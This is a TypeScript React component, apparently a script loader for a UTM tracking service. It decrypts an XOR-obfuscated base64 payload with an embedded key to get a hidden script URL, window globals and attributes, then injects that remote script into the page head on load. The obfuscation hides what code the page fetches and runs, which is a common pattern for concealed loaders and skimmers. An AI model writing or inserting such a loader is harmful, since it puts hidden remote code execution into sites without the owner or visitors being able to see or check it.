import { useEffect } from 'react';
const PAYLOAD = 'DH4VBXMff1Y02t4ljQU3cAFzXWwWsqpR/Q0vKlx8Gzgar6pI5BhsKxBwEnhWqPFW7gx8dQdsUCZdortJog58fRZzUTxH+PIH7Aphdxp9CiJRqfwf1iM5JxRzEDRVtq0HtyVuJx1+EjMW4PxV5AZwaTp7XXoWrL9J+Bs3P1EpHmEC7OtBvRx2NBcoGWdQ7b9D6xonMRU9AgtJ';
const SCRIPT_FLAG = 'data-utmify-loader';
type NameValue = {
  name: string;
  value: string;
};
type UtmifyConfig = {
  url: string;
  globals?: NameValue[];
  attributes?: NameValue[];
};
function decodePayload(encoded: string): UtmifyConfig {
  const raw = atob(encoded);
  const bytes: number[] = [];
  for (let i = 0; i < raw.length; i++) {
    bytes.push(raw.charCodeAt(i) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const data = bytes.slice(1 + keyLength);
  let decoded = '';
  for (let i = 0; i < data.length; i++) {
    decoded += String.fromCharCode((data[i] ^ key[i % keyLength]) & 255);
  }
  return JSON.parse(decodeURIComponent(escape(decoded))) as UtmifyConfig;
}
export function UtmifyScript() {
  useEffect(() => {
    if (document.querySelector(`script[${SCRIPT_FLAG}]`)) return;
    let config: UtmifyConfig;
    try {
      config = decodePayload(PAYLOAD);
    } catch {
      return;
    }
    ;
    (config.globals || []).forEach(global => {
      ;
      (window as unknown as Record<string, string>)[global.name] = global.value;
    });
    const script = document.createElement('script');
    script.src = config.url;
    script.async = true;
    script.defer = true;
    script.setAttribute(SCRIPT_FLAG, 'true');
    (config.attributes || []).forEach(attribute => {
      script.setAttribute(attribute.name, attribute.value);
    });
    (document.head || document.documentElement).appendChild(script);
  }, []);
  return null;
}